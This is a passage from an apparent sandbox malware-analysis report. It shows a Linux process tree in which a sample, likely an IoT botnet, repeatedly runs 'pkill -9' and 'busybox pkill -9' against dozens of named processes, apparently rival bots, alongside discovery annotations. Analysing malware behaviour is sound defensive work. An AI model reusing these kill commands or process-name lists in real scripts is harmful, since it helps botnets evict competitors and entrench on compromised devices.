                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                  PID:1050
                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                  busybox pkill -9 1902a3u912u3u4
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:1051
                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                  sh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:1052
                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                      pkill -9 SO190Ij1X
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                      PID:1053
                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                      busybox pkill -9 SO190Ij1X
                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                        PID:1054
                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                      sh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:1055
                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                          pkill -9 haetrghbr
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                          PID:1056
                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                          busybox pkill -9 haetrghbr
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:1057
                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                          sh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:1058
                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                              pkill -9 19ju3d
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                              PID:1059
                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                              busybox pkill -9 19ju3d
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:1060
                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                              sh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:1061
                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                  pkill -9 SORAojkf120
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                  PID:1062
                                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                                  busybox pkill -9 SORAojkf120
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                    PID:1063
                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                  sh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:1064
                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                      pkill -9 hehahejeje92
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                      PID:1065
                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                      busybox pkill -9 hehahejeje92
                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                        PID:1066
                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                      sh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:1067
                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                          pkill -9 2U2JDJA901F91
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                          PID:1068
                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                          busybox pkill -9 2U2JDJA901F91
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                            PID:1069
                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                          sh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:1070
                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                              pkill -9 SlaVLav12
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                              PID:1071
                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                              busybox pkill -9 SlaVLav12
                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                PID:1072
                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                              sh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:1073
                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                  pkill -9 helpmedaddthhhhh
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:1074
                                                                                                                                                                                                                                                                                                  • /bin/busybox
                                                                                                                                                                                                                                                                                                    busybox pkill -9 helpmedaddthhhhh
                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                      PID:1075
                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                    sh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:1076
                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                        pkill -9 2wgg9qphbq
                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                          PID:1077
                                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                                          busybox pkill -9 2wgg9qphbq
                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                            PID:1078
                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                          sh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:1079
                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                              pkill -9 Slav3Th3seD3vices
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                              PID:1080
                                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                                              busybox pkill -9 Slav3Th3seD3vices
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                PID:1081
                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                              sh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:1082
                                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                  pkill -9 hzSmYZjYMQ
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                  PID:1083
                                                                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                                                                  busybox pkill -9 hzSmYZjYMQ
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:1084
                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                  sh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:1085
                                                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                      pkill -9 5Gbf
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                      PID:1086
                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                      busybox pkill -9 5Gbf
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:1087
                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"
                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                        PID:1088
                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                          pkill -9 SoRAxD123LOL
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                          PID:1089
                                                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                                                          busybox pkill -9 SoRAxD123LOL
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:1090
                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                          sh -c "pkill -9 iaGv || busybox pkill -9 iaGv"
                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                            PID:1091
                                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                              pkill -9 iaGv
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                              PID:1092
                                                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                                                              busybox pkill -9 iaGv
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                PID:1093
                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                              sh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"
                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                PID:1094
                                                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                  pkill -9 5aA3
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                  PID:1095
                                                                                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                                                                                  busybox pkill -9 5aA3
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:1096
                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                  sh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"
                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                    PID:1097
                                                                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                      pkill -9 SoRAxD420LOL
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                      PID:1098
                                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                                      busybox pkill -9 SoRAxD420LOL
                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                        PID:1099
                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 insomni || busybox pkill -9 insomni"
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:1100
                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                          pkill -9 insomni
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                          PID:1101
                                                                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                                                                          busybox pkill -9 insomni
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                            PID:1102
                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                          sh -c "pkill -9 640277 || busybox pkill -9 640277"
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:1103
                                                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                              pkill -9 640277
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                              PID:1104
                                                                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                                                                              busybox pkill -9 640277
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:1105
                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                              sh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:1106
                                                                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                  pkill -9 SoraBeReppin1337
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                  • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                  PID:1107
                                                                                                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                  busybox pkill -9 SoraBeReppin1337
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1108
                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                  sh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                  • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                                  PID:1109
                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                    pkill -9 ipcamCache
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                                    PID:1110
                                                                                                                                                                                                                                                                                                                                                  • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                    busybox pkill -9 ipcamCache
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                    • System Network Configuration Discovery
                                                                                                                                                                                                                                                                                                                                                    PID:1111
                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                  sh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1112
                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                      pkill -9 66tlGg9Q
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                      PID:1113
                                                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                      busybox pkill -9 66tlGg9Q
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1114
                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 T || busybox pkill -9 T"
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:1115
                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                          pkill -9 T
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:1116
                                                                                                                                                                                                                                                                                                                                                          • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                            busybox pkill -9 T
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1117
                                                                                                                                                                                                                                                                                                                                                          • /bin/sh
                                                                                                                                                                                                                                                                                                                                                            sh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:1118
                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                pkill -9 jUYfouyf87
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                PID:1119
                                                                                                                                                                                                                                                                                                                                                              • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                busybox pkill -9 jUYfouyf87
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1120
                                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                sh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:1121
                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                    pkill -9 6ke3
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1122
                                                                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                      busybox pkill -9 6ke3
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1123
                                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:1124
                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                          pkill -9 TOKYO3
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                          PID:1125
                                                                                                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                          busybox pkill -9 TOKYO3
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1126
                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                          sh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1127
                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                              pkill -9 lyEeaXul2dULCVxh
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1128
                                                                                                                                                                                                                                                                                                                                                                              • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                busybox pkill -9 lyEeaXul2dULCVxh
                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1129
                                                                                                                                                                                                                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                sh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1130
                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                    pkill -9 93OfjHZ2z
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                    PID:1131
                                                                                                                                                                                                                                                                                                                                                                                  • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                    busybox pkill -9 93OfjHZ2z
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1132
                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                    sh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"
                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1133
                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                        pkill -9 TY2gD6MZvKc7KU6r
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                        • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                        PID:1134
                                                                                                                                                                                                                                                                                                                                                                                      • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                        busybox pkill -9 TY2gD6MZvKc7KU6r
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1135
                                                                                                                                                                                                                                                                                                                                                                                      • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                        sh -c "pkill -9 mMkiy6f87l || busybox pkill -9 mMkiy6f87l"
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1136
                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                            pkill -9 mMkiy6f87l
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:1137
                                                                                                                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                              busybox pkill -9 mMkiy6f87l
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1138
                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                              sh -c "pkill -9 A023UU4U24UIU || busybox pkill -9 A023UU4U24UIU"
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1139
                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                  pkill -9 A023UU4U24UIU
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                  PID:1140
                                                                                                                                                                                                                                                                                                                                                                                                • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                  busybox pkill -9 A023UU4U24UIU
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1141
                                                                                                                                                                                                                                                                                                                                                                                                • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                  sh -c "pkill -9 TheWeeknd || busybox pkill -9 TheWeeknd"
                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1142
                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                      pkill -9 TheWeeknd
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                      • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1143
                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                      busybox pkill -9 TheWeeknd
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1144
                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                      sh -c "pkill -9 mioribitches || busybox pkill -9 mioribitches"
                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:1145
                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                          pkill -9 mioribitches
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1146
                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                          busybox pkill -9 mioribitches
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1147
                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                          sh -c "pkill -9 A5p9 || busybox pkill -9 A5p9"
                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:1148
                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                              pkill -9 A5p9
                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1149
                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                              busybox pkill -9 A5p9
                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:1150
                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                              sh -c "pkill -9 TheWeeknds || busybox pkill -9 TheWeeknds"
                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:1151
                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                  pkill -9 TheWeeknds
                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1152
                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                    busybox pkill -9 TheWeeknds
                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1153
                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                    sh -c "pkill -9 mnblkjpoi || busybox pkill -9 mnblkjpoi"
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1154
                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                        pkill -9 mnblkjpoi
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1155
                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/busybox
                                                                                                                                                                                                                                                                                                                                                                                                                          busybox pkill -9 mnblkjpoi
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1156
                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                                                                                                                                                                                                                                                          sh -c "pkill -9 AbAd || busybox pkill -9 AbAd"
